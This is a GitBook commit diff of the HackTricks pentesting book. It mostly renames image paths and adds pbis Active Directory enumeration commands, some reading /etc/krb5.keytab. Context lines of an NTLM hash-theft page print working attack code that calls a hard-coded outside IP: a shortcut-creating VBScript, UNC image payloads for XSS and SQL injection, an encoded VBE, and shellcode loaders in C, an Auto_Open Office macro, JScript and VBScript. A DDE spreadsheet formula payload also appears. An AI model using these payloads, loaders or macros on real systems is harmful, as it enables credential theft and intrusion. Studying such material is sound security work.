GitBook: [master] 12 pages and 24 assets modified
|
@ -10,7 +10,7 @@ dht udp "DHT Nodes"
|
|||
|
||||
![](.gitbook/assets/image%20%28182%29.png)
|
||||
|
||||
![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
|
||||
![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
|
||||
|
||||
InfluxDB
|
||||
|
||||
|
|
|
@ -16,7 +16,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
|
|||
**If you want to** share some tricks with the community **you can also submit** pull requests **to \[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) that will be reflected in this book.
|
||||
Don't forget to\*\* give ⭐ on the github to motivate me to continue developing this book.
|
||||
|
||||
![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)
|
||||
![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%283%29.png)
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
|
||||
|
||||
|
|
|
@ -367,7 +367,7 @@ Partition Record Format:
|
|||
|
||||
In order to mount a MBR in Linux you first need to get the start offset \(you can use `fdisk` and the the `p` command\)
|
||||
|
||||
![](../../.gitbook/assets/image%20%28413%29%20%281%29.png)
|
||||
![](../../.gitbook/assets/image%20%28413%29%20%283%29%20%281%29.png)
|
||||
|
||||
An then use the following code
|
||||
|
||||
|
|
|
@ -146,7 +146,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
|
|||
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
|
||||
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png)
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
||||
|
||||
|
|
|
@ -354,7 +354,7 @@ int main(int argc, char * argv[]) {
|
|||
I exploit needs to find a pointer to something mounted on the host. The original exploit used the file `/.dockerinit` and this modified version uses `/etc/hostname`. **If the exploit isn't working** maybe you need to set a different file. To find a file that is mounted in the host just execute `mount` command:
|
||||
{% endhint %}
|
||||
|
||||
![](../../.gitbook/assets/image%20%28172%29.png)
|
||||
![](../../.gitbook/assets/image%20%28407%29.png)
|
||||
|
||||
**The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com/)\*\*\*\*
|
||||
|
||||
|
|
|
@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
|
|||
|
||||
![](../../../.gitbook/assets/image%20%28211%29.png)
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29%20%281%29.png)
|
||||
![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29.png)
|
||||
|
||||
Because you will be able to call them
|
||||
|
||||
|
|
|
@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is
|
|||
|
||||
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
|
||||
|
||||
![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%281%29.png)
|
||||
![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
|
||||
|
||||
|
|
|
@ -115,6 +115,8 @@ ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authty
|
|||
|
||||
### Manual
|
||||
|
||||
#### ldapsearch
|
||||
|
||||
Check null credentials or if your credentials are valid:
|
||||
|
||||
```bash
|
||||
|
@ -200,6 +202,51 @@ To see if you have access to any password you can use grep after executing one o
|
|||
|
||||
Please, notice that the passwords that you can find here could not be the real ones...
|
||||
|
||||
#### pbis
|
||||
|
||||
You can download **pbis** from here: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) and it's usually installed in `/opt/pbis`.
|
||||
**Pbis** allow you to get basic information easily:
|
||||
|
||||
```bash
|
||||
#Get known domains info
|
||||
./get-status
|
||||
./lsa get-status
|
||||
|
||||
#Get basic metrics
|
||||
./get-metrics
|
||||
./lsa get-metrics
|
||||
|
||||
#Get users
|
||||
./enum-users
|
||||
./lsa enum-users
|
||||
|
||||
#Get groups
|
||||
./enum-groups
|
||||
./lsa enum-groups
|
||||
|
||||
#Get all kind of objects
|
||||
./enum-objects
|
||||
./lsa enum-objects
|
||||
|
||||
#Get groups of a user
|
||||
./list-groups-for-user <username>
|
||||
./lsa list-groups-for-user <username>
|
||||
#Get gorups of each user
|
||||
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
|
||||
|
||||
#Get users of a group
|
||||
./enum-members --by-name "domain admins"
|
||||
./lsa enum-members --by-name "domain admins"
|
||||
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
|
||||
|
||||
#Get description of each user
|
||||
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
|
||||
echo "$line";
|
||||
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
|
||||
echo "======================"
|
||||
done
|
||||
```
|
||||
|
||||
## Graphical Interface
|
||||
|
||||
### Apache Directory
|
||||
|
|
|
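Review bot: The pbis commands added in this hunk, from `./get-status` through `./adtool ...`, are written as relative paths, but the preceding paragraph only says pbis is "usually installed in `/opt/pbis`", so a reader who runs them from another directory gets a "No such file or directory" error with no hint of why. Suggest stating the working directory once before the fence, e.g. `The commands below are run from the pbis binary directory (presumably /opt/pbis/bin); use the full path if you are elsewhere.` The comment line `#Get gorups of each user` also has a typo that should read `#Get groups of each user`. The `sed -e "s,\\\,\\\\\\\,g"` expression on the two pipeline lines relies on bash double-quote backslash handling and is hard to read; a one-line comment such as `# doubles the backslash in DOMAIN\user names so the name survives the next command` would help a reader understand its purpose before copying it.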
@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
|
|||
</methodCall>
|
||||
```
|
||||
|
||||
![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
|
||||
![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
|
||||
|
||||
![](../../.gitbook/assets/image%20%28224%29.png)
|
||||
|
||||
|
|
|
@ -320,7 +320,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
|
|||
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
|
||||
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
|
||||
|
||||
![](../.gitbook/assets/image%20%28253%29%20%281%29.png)
|
||||
![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29.png)
|
||||
|
||||
{% hint style="info" %}
|
||||
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.
|
||||
|
|
|
@ -118,7 +118,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
|
|||
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%283%29.png)
|
||||
![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
||||
|
||||
|
|
|
@ -102,7 +102,7 @@ find, findstr, [x]copy, move, replace, del, rename and many more!
|
|||
|
||||
## Auto-Complete
|
||||
|
||||
You just need to type ‘\\host\’ the auto-complete will do the trick under the explorer and the run dialog box.
|
||||
You just need to type ‘\host\’ the auto-complete will do the trick under the explorer and the run dialog box.
|
||||
|
||||
![](https://osandamalith.files.wordpress.com/2017/03/explorer.png?w=640)
|
||||
|
||||
|
@ -160,9 +160,9 @@ We can create a shortcut containing our network path and as you as you open the
|
|||
Set shl = CreateObject("WScript.Shell")
|
||||
Set fso = CreateObject("Scripting.FileSystemObject")
|
||||
currentFolder = shl.CurrentDirectory
|
||||
|
||||
|
||||
Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "\StealMyHashes.lnk"))
|
||||
|
||||
|
||||
sc.TargetPath = "\\35.164.153.224\@OsandaMalith"
|
||||
sc.WindowStyle = 1
|
||||
sc.HotKey = "Ctrl+Alt+O"
|
||||
|
@ -223,13 +223,13 @@ Start-Process \\192.168.0.1\aa
|
|||
IE will resolve UNC paths. For example
|
||||
|
||||
```text
|
||||
<img src="\\\\192.168.0.1\\aa">
|
||||
<img src="\\\\192.168.0.1\\aa">
|
||||
```
|
||||
|
||||
You can inject under XSS or in scenarios you find SQL injection. For example.
|
||||
|
||||
```text
|
||||
http://host.tld/?id=-1' union select 1,'<img src="\\\\192.168.0.1\\aa">';%00
|
||||
http://host.tld/?id=-1' union select 1,'<img src="\\\\192.168.0.1\\aa">';%00
|
||||
```
|
||||
|
||||
## VBScript
|
||||
|
@ -258,7 +258,6 @@ Here’ the encoded version. You can encode and save this as something.vbe
|
|||
|
||||
```text
|
||||
#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@
|
||||
|
||||
```
|
||||
|
||||
You can apply this in html files too. But only works with IE. You can save this as something.hta which will be an HTML Application under windows, which mshta.exe will execute it. By default it uses IE.
|
||||
|
@ -343,9 +342,9 @@ Here’s a small shellcode I made. This shellcode uses CreateFile and tries to r
|
|||
# include <stdio.h>
|
||||
# include <string.h>
|
||||
# include <windows.h>
|
||||
|
||||
|
||||
int main() {
|
||||
|
||||
|
||||
char *shellcode =
|
||||
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x4c\x03\x02\x02\x81\xf1\x02\x02"
|
||||
"\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
|
||||
|
@ -370,21 +369,21 @@ int main() {
|
|||
"\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf"
|
||||
"\x21\x05\x05\x05\x50\x05\x05\x05\x6b\x65\x72\x6e\x65\x6c\x33\x32"
|
||||
"\x2e\x64\x6c\x6c\x05\x2f\x2f\x65\x72\x72\x6f\x72\x2f\x61\x61\x05";
|
||||
|
||||
|
||||
DWORD oldProtect;
|
||||
|
||||
|
||||
wprintf(L"Length : %d bytes\n@OsandaMalith", strlen(shellcode));
|
||||
BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
|
||||
|
||||
|
||||
if (!ret) {
|
||||
fprintf(stderr, "%s", "Error Occured");
|
||||
return EXIT_FAILURE;
|
||||
}
|
||||
|
||||
|
||||
((void(*)(void))shellcode)();
|
||||
|
||||
|
||||
VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect);
|
||||
|
||||
|
||||
return EXIT_SUCCESS;
|
||||
}
|
||||
```
|
||||
|
@ -403,7 +402,7 @@ Here’s the above shellcode applied inside a Word/Excel macro. You can use the
|
|||
' Website: https://osandamalith
|
||||
' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
|
||||
' This is a word/excel macro. This can be used in vb6 applications as well
|
||||
|
||||
|
||||
#If Vba7 Then
|
||||
Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _
|
||||
ByVal lpThreadAttributes As Long, _
|
||||
|
@ -412,19 +411,19 @@ Here’s the above shellcode applied inside a Word/Excel macro. You can use the
|
|||
lpParameter As Long, _
|
||||
ByVal dwCreationFlags As Long, _
|
||||
lpThreadId As Long) As LongPtr
|
||||
|
||||
|
||||
|
||||
|
||||
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _
|
||||
ByVal lpAddress As Long, _
|
||||
ByVal dwSize As Long, _
|
||||
ByVal flAllocationType As Long, _
|
||||
ByVal flProtect As Long) As LongPtr
|
||||
|
||||
|
||||
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _
|
||||
ByVal Destination As LongPtr, _
|
||||
ByRef Source As Any, _
|
||||
ByVal Length As Long) As LongPtr
|
||||
|
||||
|
||||
#Else
|
||||
Private Declare Function CreateThread Lib "kernel32" ( _
|
||||
ByVal lpThreadAttributes As Long, _
|
||||
|
@ -433,22 +432,22 @@ Here’s the above shellcode applied inside a Word/Excel macro. You can use the
|
|||
lpParameter As Long, _
|
||||
ByVal dwCreationFlags As Long, _
|
||||
lpThreadId As Long) As Long
|
||||
|
||||
|
||||
Private Declare Function VirtualAlloc Lib "kernel32" ( _
|
||||
ByVal lpAddress As Long, _
|
||||
ByVal dwSize As Long, _
|
||||
ByVal flAllocationType As Long, _
|
||||
ByVal flProtect As Long) As Long
|
||||
|
||||
|
||||
Private Declare Function RtlMoveMemory Lib "kernel32" ( _
|
||||
ByVal Destination As Long, _
|
||||
ByRef Source As Any, _
|
||||
ByVal Length As Long) As Long
|
||||
#EndIf
|
||||
|
||||
|
||||
Const MEM_COMMIT = &H1000
|
||||
Const PAGE_EXECUTE_READWRITE = &H40
|
||||
|
||||
|
||||
Sub Auto_Open()
|
||||
Dim source As Long, i As Long
|
||||
#If Vba7 Then
|
||||
|
@ -456,7 +455,7 @@ Sub Auto_Open()
|
|||
#Else
|
||||
Dim lpMemory As Long, lResult As Long
|
||||
#EndIf
|
||||
|
||||
|
||||
Dim bShellcode(376) As Byte
|
||||
bShellcode(0) = 232
|
||||
bShellcode(1) = 255
|
||||
|
@ -514,10 +513,10 @@ DX = new ActiveXObject("DynamicWrapperX");
|
|||
DX.Register("kernel32.dll", "VirtualAlloc", "i=luuu", "r=u");
|
||||
DX.Register("kernel32.dll","CreateThread","i=uullu","r=u" );
|
||||
DX.Register("kernel32.dll", "WaitForSingleObject", "i=uu", "r=u");
|
||||
|
||||
|
||||
var MEM_COMMIT = 0x1000;
|
||||
var PAGE_EXECUTE_READWRITE = 0x40;
|
||||
|
||||
|
||||
var sc = [
|
||||
0xe8, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x5f, 0xb9, 0x55, 0x03, 0x02, 0x02, 0x81, 0xf1, 0x02, 0x02, 0x02, 0x02, 0x83, 0xc7,
|
||||
0x1d, 0x33, 0xf6, 0xfc, 0x8a, 0x07, 0x3c, 0x05, 0x0f, 0x44, 0xc6, 0xaa, 0xe2, 0xf6, 0xe8, 0x05, 0x05, 0x05, 0x05, 0x5e,
|
||||
|
@ -538,7 +537,7 @@ var sc = [
|
|||
0x0c, 0x30, 0x8b, 0x44, 0x33, 0x1c, 0x8d, 0x04, 0x88, 0x8b, 0x04, 0x30, 0x03, 0xc6, 0xeb, 0xdf, 0x21, 0x05, 0x05, 0x05,
|
||||
0x50, 0x05, 0x05, 0x05, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x05, 0x2f, 0x2f, 0x33,
|
||||
0x35, 0x2e, 0x31, 0x36, 0x34, 0x2e, 0x31, 0x35, 0x33, 0x2e, 0x32, 0x32, 0x34, 0x2f, 0x61, 0x61, 0x05];
|
||||
|
||||
|
||||
var scLocation = DX.VirtualAlloc(0, sc.length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
for(var i = 0; i < sc.length; i++) DX.NumPut(sc[i],scLocation,i);
|
||||
var thread = DX.CreateThread(0,0,scLocation,0,0);
|
||||
|
@ -554,15 +553,15 @@ var thread = DX.CreateThread(0,0,scLocation,0,0);
|
|||
' Website: https://osandamalith.com
|
||||
' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
|
||||
' Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
|
||||
|
||||
|
||||
Set DX = CreateObject("DynamicWrapperX")
|
||||
DX.Register "kernel32.dll", "VirtualAlloc", "i=luuu", "r=u"
|
||||
DX.Register "kernel32.dll","CreateThread","i=uullu","r=u"
|
||||
DX.Register "kernel32.dll", "WaitForSingleObject", "i=uu", "r=u"
|
||||
|
||||
|
||||
Const MEM_COMMIT = &H1000
|
||||
Const PAGE_EXECUTE_READWRITE = &H40
|
||||
|
||||
|
||||
shellcode = Array( _
|
||||
&He8, &Hff, &Hff, &Hff, &Hff, &Hc0, &H5f, &Hb9, &H55, &H03, &H02, &H02, &H81, &Hf1, &H02, &H02, &H02, &H02, &H83, &Hc7, _
|
||||
&H1d, &H33, &Hf6, &Hfc, &H8a, &H07, &H3c, &H05, &H0f, &H44, &Hc6, &Haa, &He2, &Hf6, &He8, &H05, &H05, &H05, &H05, &H5e, _
|
||||
|
@ -583,13 +582,13 @@ shellcode = Array( _
|
|||
&H0c, &H30, &H8b, &H44, &H33, &H1c, &H8d, &H04, &H88, &H8b, &H04, &H30, &H03, &Hc6, &Heb, &Hdf, &H21, &H05, &H05, &H05, _
|
||||
&H50, &H05, &H05, &H05, &H6b, &H65, &H72, &H6e, &H65, &H6c, &H33, &H32, &H2e, &H64, &H6c, &H6c, &H05, &H2f, &H2f, &H33, _
|
||||
&H35, &H2e, &H31, &H36, &H34, &H2e, &H31, &H35, &H33, &H2e, &H32, &H32, &H34, &H2f, &H61, &H61, &H05)
|
||||
|
||||
|
||||
scLocation = DX.VirtualAlloc(0, UBound(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
|
||||
|
||||
|
||||
For i =LBound(shellcode) to UBound(shellcode)
|
||||
DX.NumPut shellcode(i),scLocation,i
|
||||
Next
|
||||
|
||||
|
||||
thread = DX.CreateThread (0,0,scLocation,0,0)
|
||||
```
|
||||
|
||||
|
|